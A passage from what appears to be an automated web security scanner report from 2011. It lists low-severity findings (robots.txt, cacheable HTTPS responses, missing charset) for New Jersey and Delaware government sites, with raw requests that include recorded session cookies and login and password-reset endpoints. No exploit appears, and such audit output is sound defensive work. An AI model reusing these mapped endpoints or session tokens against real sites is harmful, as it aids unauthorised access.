Disallow: /REPORTER/3dseries/2007/
Disallow: /REPORTER/3dseries/2006/
Disallow: /REPORTER/3dseries/2005/
Disallow: /
...[SNIP]...

17.4. http://www.state.nj.us/patentbank/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/patentbank/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.state.nj.us

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:40:37 GMT
Content-length: 180
Content-type: text/plain
Last-modified: Tue, 06 Feb 2007 15:32:05 GMT
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /cgi-bin/homelandsecurity/
Disallow: /cgi-bin/dobi/licenseesearch/
Disallow: /cgi-bin/consumeraffairs/search/
Disallow: /cgi-bin/state/
Disallow: /Support/

18. Cacheable HTTPS response previous next
There are 27 instances of this issue:

https://egov.dnrec.delaware.gov/egovpublic/dnrec/disp
https://egov.dnrec.delaware.gov/egovpublic/js/MenuItems.js
https://maps-api-ssl.google.com/maps
https://maps-api-ssl.google.com/maps/api/js
https://market.android.com/details
https://market.android.com/developer
https://newyorkchildsupport.com/child_support_services.html
https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/UI/Login
https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/selfservice/IDRetrieval
https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/selfservice/PasswordReset
https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/signup/NJLoginNewUser
https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login
https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/selfservice/IDRetrieval
https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/selfservice/PasswordReset
https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/signup/NJLoginNewUser
https://www.state.nj.us/treas/treasmail.shtml
https://www.state.nj.us/treas/webmaster.shtml
https://www1.state.nj.us/
https://www1.state.nj.us/TYTR_Saver/jsp/common/Login.jsp
https://www6.state.nj.us/LOT_LVC/jsp/lvc1_0_vip_reg.jsp
https://www6.state.nj.us/LOT_LVC/jsp/lvc1_S0_login.jsp
https://www6.state.nj.us/LOT_LVC/jsp/lvc2_0_vip_forgot.jsp
https://wwwnet1.state.nj.us/GOV/OEG/NJPatentBank/AddPatent.aspx
https://wwwnet1.state.nj.us/GOV/OEG/NJPatentBank/PatentDetail.aspx
https://wwwnet1.state.nj.us/GOV/OEG/NJPatentBank/PatentSearchDisclaimer.aspx
https://wwwnet1.state.nj.us/GOV/OEG/NJPatentBank/Register.aspx
https://wwwnet1.state.nj.us/GOV/OEG/NJPatentBank/Search.aspx

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

18.1. https://egov.dnrec.delaware.gov/egovpublic/dnrec/disp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://egov.dnrec.delaware.gov
Path:	/egovpublic/dnrec/disp

Request

Response

18.2. https://egov.dnrec.delaware.gov/egovpublic/js/MenuItems.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://egov.dnrec.delaware.gov
Path:	/egovpublic/js/MenuItems.js

Request

GET /egovpublic/js/MenuItems.js HTTP/1.1
Host: egov.dnrec.delaware.gov
Connection: keep-alive
Referer: https://egov.dnrec.delaware.gov/egovpublic/dnrec/disp?doc=publicsubmenu&op=prlicense
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1310522495650:ss=1310522357519; JSESSIONID=0000HfxtYAmm9bcyEK0I_lEybWb:1414d4mgq

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 02:02:22 GMT
Server: Apache/2.2.0 (Fedora)
Last-Modified: Mon, 25 Apr 2011 19:07:10 GMT
Content-Length: 4150
Connection: close
Content-Type: application/x-javascript
Content-Language: en-US

<!--

/*
Configure menu styles below
NOTE: To edit the link colors, go to the STYLE tags and edit the ssm2Items colors
*/
YOffset=225; // no quotes!!
XOffset=0;
staticYOffset=30; // no quotes!
...[SNIP]...

18.3. https://maps-api-ssl.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://maps-api-ssl.google.com
Path:	/maps

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.4. https://maps-api-ssl.google.com/maps/api/js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://maps-api-ssl.google.com
Path:	/maps/api/js

Request

GET /maps/api/js HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Language
Date: Wed, 13 Jul 2011 01:52:15 GMT
Server: mafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Connection: close

alert("The Google Maps API server rejected your request. The \x22sensor\x22 parameter specified in the request must be set to either \x22true\x22 or \x22false\x22.")

18.5. https://market.android.com/details previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://market.android.com
Path:	/details

Request

Response

18.6. https://market.android.com/developer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://market.android.com
Path:	/developer

Request

Response

18.7. https://newyorkchildsupport.com/child_support_services.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://newyorkchildsupport.com
Path:	/child_support_services.html

Request

GET /child_support_services.html HTTP/1.1
Host: newyorkchildsupport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 13 Jul 2011 01:52:16 GMT
Server: Apache/2.2.13 (Red Hat)
Last-Modified: Wed, 06 Jul 2011 17:10:46 GMT
ETag: "20010-877c-4a769ae637180"
Accept-Ranges: bytes
Content-Length: 34684
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><!-
...[SNIP]...

18.8. https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/UI/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://portal01.state.nj.us
Path:	/http://portal20.sa.state.nj.us:8080/amserver/UI/Login

Request

Response

18.9. https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/selfservice/IDRetrieval previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://portal01.state.nj.us
Path:	/http://portal20.sa.state.nj.us:8080/selfservice/IDRetrieval

Request

GET /http://portal20.sa.state.nj.us:8080/selfservice/IDRetrieval HTTP/1.1
Host: portal01.state.nj.us
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: %2Fportal20.sa.state.nj.us_JSESSIONID=8B7AC0DFAC1D241DA769612C928B4D1F|portal20.sa.state.nj.us|/|iplanet; %2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4Sfcy8KCHkif57us6GAU2YZ9vUrrHig0JMuag%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; %2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:41:12 GMT
Content-type: text/html;charset=ISO-8859-1
Content-Length: 3087
Connection: Keep-Alive
Keep-Alive: timeout=50,max=9

   <html>
   <head>
   <title>myNewJersey Logon ID Retrieval - Step 1</title>
   
<!-- for use in NJ apps (not desktop): see instructions
...[SNIP]...

18.10. https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/selfservice/PasswordReset previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://portal01.state.nj.us
Path:	/http://portal20.sa.state.nj.us:8080/selfservice/PasswordReset

Request

GET /http://portal20.sa.state.nj.us:8080/selfservice/PasswordReset HTTP/1.1
Host: portal01.state.nj.us
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: %2Fportal20.sa.state.nj.us_JSESSIONID=8B7AC0DFAC1D241DA769612C928B4D1F|portal20.sa.state.nj.us|/|iplanet; %2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4Sfcy8KCHkif57us6GAU2YZ9vUrrHig0JMuag%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; %2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet; %2Fselfserviceportal20.sa.state.nj.us_JSESSIONID=CA18EEAFF644FACB71077AFF38C6D49C|portal20.sa.state.nj.us|/selfservice|iplanet

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:41:14 GMT
Content-type: text/html;charset=ISO-8859-1
Content-Length: 3074
Connection: Keep-Alive
Keep-Alive: timeout=50,max=9

   <html>
   <head>
   <title>myNewJersey Password Reset - Step 1</title>
   
<!-- for use in NJ apps (not desktop): see instructions for
...[SNIP]...

18.11. https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/signup/NJLoginNewUser previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://portal01.state.nj.us
Path:	/http://portal20.sa.state.nj.us:8080/signup/NJLoginNewUser

Request

Response

18.12. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://portal01.state.nj.us
Path:	/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

Request

Response

18.13. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/selfservice/IDRetrieval previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://portal01.state.nj.us
Path:	/http:/portal20.sa.state.nj.us:8080/selfservice/IDRetrieval

Request

GET /http:/portal20.sa.state.nj.us:8080/selfservice/IDRetrieval HTTP/1.1
Host: portal01.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:53:03 GMT
Content-type: text/html;charset=ISO-8859-1
Content-Length: 3087
Connection: close

   <html>
   <head>
   <title>myNewJersey Logon ID Retrieval - Step 1</title>
   
<!-- for use in NJ apps (not desktop): see instructions
...[SNIP]...

18.14. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/selfservice/PasswordReset previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://portal01.state.nj.us
Path:	/http:/portal20.sa.state.nj.us:8080/selfservice/PasswordReset

Request

GET /http:/portal20.sa.state.nj.us:8080/selfservice/PasswordReset HTTP/1.1
Host: portal01.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:53:03 GMT
Content-type: text/html;charset=ISO-8859-1
Content-Length: 3074
Connection: close

   <html>
   <head>
   <title>myNewJersey Password Reset - Step 1</title>
   
<!-- for use in NJ apps (not desktop): see instructions for
...[SNIP]...

18.15. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/signup/NJLoginNewUser previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://portal01.state.nj.us
Path:	/http:/portal20.sa.state.nj.us:8080/signup/NJLoginNewUser

Request

Response

18.16. https://www.state.nj.us/treas/treasmail.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.state.nj.us
Path:	/treas/treasmail.shtml

Request

GET /treas/treasmail.shtml HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:55 GMT
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN">
<head>
<me
...[SNIP]...

18.17. https://www.state.nj.us/treas/webmaster.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.state.nj.us
Path:	/treas/webmaster.shtml

Request

GET /treas/webmaster.shtml HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.18. https://www1.state.nj.us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www1.state.nj.us
Path:	/

Request

GET / HTTP/1.1
Host: www1.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:45 GMT
Content-length: 222
Content-type: text/html
Last-modified: Wed, 24 Jun 2009 15:51:09 GMT
Etag: "de-4a424b6d"
Accept-ranges: bytes
Connection: close

<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

</head>

<body>
<center><h3>SORRY, THE PAGE YOU ARE TRYING TO ACCESS DOES NOT EXIST.</h3></cente
...[SNIP]...

18.19. https://www1.state.nj.us/TYTR_Saver/jsp/common/Login.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www1.state.nj.us
Path:	/TYTR_Saver/jsp/common/Login.jsp

Request

GET /TYTR_Saver/jsp/common/Login.jsp HTTP/1.1
Host: www1.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.20. https://www6.state.nj.us/LOT_LVC/jsp/lvc1_0_vip_reg.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www6.state.nj.us
Path:	/LOT_LVC/jsp/lvc1_0_vip_reg.jsp

Request

GET /LOT_LVC/jsp/lvc1_0_vip_reg.jsp HTTP/1.1
Host: www6.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.21. https://www6.state.nj.us/LOT_LVC/jsp/lvc1_S0_login.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www6.state.nj.us
Path:	/LOT_LVC/jsp/lvc1_S0_login.jsp

Request

GET /LOT_LVC/jsp/lvc1_S0_login.jsp HTTP/1.1
Host: www6.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.22. https://www6.state.nj.us/LOT_LVC/jsp/lvc2_0_vip_forgot.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www6.state.nj.us
Path:	/LOT_LVC/jsp/lvc2_0_vip_forgot.jsp

Request

GET /LOT_LVC/jsp/lvc2_0_vip_forgot.jsp HTTP/1.1
Host: www6.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.23. https://wwwnet1.state.nj.us/GOV/OEG/NJPatentBank/AddPatent.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://wwwnet1.state.nj.us
Path:	/GOV/OEG/NJPatentBank/AddPatent.aspx

Request

GET /GOV/OEG/NJPatentBank/AddPatent.aspx HTTP/1.1
Host: wwwnet1.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:49:49 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Add a Pat
...[SNIP]...

18.24. https://wwwnet1.state.nj.us/GOV/OEG/NJPatentBank/PatentDetail.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://wwwnet1.state.nj.us
Path:	/GOV/OEG/NJPatentBank/PatentDetail.aspx

Request

GET /GOV/OEG/NJPatentBank/PatentDetail.aspx?id=657 HTTP/1.1
Host: wwwnet1.state.nj.us
Connection: keep-alive
Referer: https://wwwnet1.state.nj.us/GOV/OEG/NJPatentBank/Search.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: %2Fportal20.sa.state.nj.us_JSESSIONID=8B7AC0DFAC1D241DA769612C928B4D1F|portal20.sa.state.nj.us|/|iplanet; %2Fselfserviceportal20.sa.state.nj.us_JSESSIONID=CA18EEAFF644FACB71077AFF38C6D49C|portal20.sa.state.nj.us|/selfservice|iplanet; %2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4SfcwnWD57gRRgZ4eEM9pK249RFqRMN77V4TQ%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; %2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet; ASP.NET_SessionId=yfdwbgnpnpobbsxxzoer2qii

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:44:19 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Patent De
...[SNIP]...

18.25. https://wwwnet1.state.nj.us/GOV/OEG/NJPatentBank/PatentSearchDisclaimer.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://wwwnet1.state.nj.us
Path:	/GOV/OEG/NJPatentBank/PatentSearchDisclaimer.aspx

Request

GET /GOV/OEG/NJPatentBank/PatentSearchDisclaimer.aspx HTTP/1.1
Host: wwwnet1.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:49:51 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Terms of
...[SNIP]...

18.26. https://wwwnet1.state.nj.us/GOV/OEG/NJPatentBank/Register.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://wwwnet1.state.nj.us
Path:	/GOV/OEG/NJPatentBank/Register.aspx

Request

GET /GOV/OEG/NJPatentBank/Register.aspx HTTP/1.1
Host: wwwnet1.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:49:49 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 156419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
NJ Patent
...[SNIP]...

18.27. https://wwwnet1.state.nj.us/GOV/OEG/NJPatentBank/Search.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://wwwnet1.state.nj.us
Path:	/GOV/OEG/NJPatentBank/Search.aspx

Request

GET /GOV/OEG/NJPatentBank/Search.aspx HTTP/1.1
Host: wwwnet1.state.nj.us
Connection: keep-alive
Referer: http://www.state.nj.us/patentbank/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: %2Fportal20.sa.state.nj.us_JSESSIONID=8B7AC0DFAC1D241DA769612C928B4D1F|portal20.sa.state.nj.us|/|iplanet; %2Fselfserviceportal20.sa.state.nj.us_JSESSIONID=CA18EEAFF644FACB71077AFF38C6D49C|portal20.sa.state.nj.us|/selfservice|iplanet; %2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4SfczfjhoFFDpWNk0ih9CnFjKv6RlTaRw0JXs%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; %2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:42:27 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Find a NJ
...[SNIP]...

19. Multiple content types specified previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/feeds/page.php

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Content-type: text
text/html; charset=utf-8

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /feeds/page.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20. HTML does not specify charset previous next
There are 32 instances of this issue:

http://five.cdn-image.com/__media__/pics/291/search-field-bg.gif
http://jqueryui.com/about
http://legis.delaware.gov/images/spacer.gif
https://portal031.state.nj.us/*
http://public.leginfo.state.ny.us/menugetf.cgi
http://www.e-zpassny.com/
http://www.house.gov/velazquez/
http://www.judiciary.state.nj.us/kids/index.htm
http://www.nj.gov/mvc/online/driverhistory.shtml
http://www.nj.gov/mynj/myNJRestrHelp.html
http://www.nj.gov/nj/deptserv.html
http://www.nj.gov/nj/govinfo/njgov/alphaserv.html
http://www.opencube.com/
http://www.state.nj.us/health/vital/vital.htm
http://www.state.nj.us/lottery/
http://www.state.nj.us/lottery/instant/2-0_instant_games.htm
http://www.state.nj.us/mvc/online/roadtest.shtml
http://www.state.nj.us/nj/deptserv.html
http://www.state.nj.us/nj/govinfo/njgov/alphaserv.html
http://www.state.nj.us/transportation/commuter/trafficinfo/
http://www.state.nj.us/treasury/administration/grau/index.html
http://www.state.nj.us/treasury/pensions/index2.htm
http://www.state.nj.us/treasury/pensions/pers1.htm
http://www.state.nj.us/treasury/pensions/pfrs1.htm
http://www.state.nj.us/treasury/pensions/shbp.htm
http://www.state.nj.us/treasury/pensions/sprs1.htm
http://www.state.nj.us/treasury/pensions/tpaf1.htm
https://www1.state.nj.us/TYTR_Saver/jsp/common/Login.jsp
https://www16.state.nj.us/DOBI_BNKOLS/*
https://www16.state.nj.us/DOBI_DEPGUDPA/*
https://www16.state.nj.us/NJ_PREMIER_EBIZ/*
https://www16.state.nj.us/TYP_MBOSREG/*

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

20.1. http://five.cdn-image.com/__media__/pics/291/search-field-bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://five.cdn-image.com
Path:	/__media__/pics/291/search-field-bg.gif

Request

GET /__media__/pics/291/search-field-bg.gif HTTP/1.1
Host: five.cdn-image.com
Proxy-Connection: keep-alive
Referer: http://soris.us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Wed, 13 Jul 2011 11:41:28 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.64</center>
</body>
</html>

20.2. http://jqueryui.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/about

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.3. http://legis.delaware.gov/images/spacer.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://legis.delaware.gov
Path:	/images/spacer.gif

Request

GET /images/spacer.gif HTTP/1.1
Host: legis.delaware.gov
Proxy-Connection: keep-alive
Referer: http://legis.delaware.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1310522455746:ss=1310522357519

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 13 Jul 2011 02:01:08 GMT
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 13 Jul 2011 02:01:08 GMT
Content-Type: text/html
Content-Length: 159

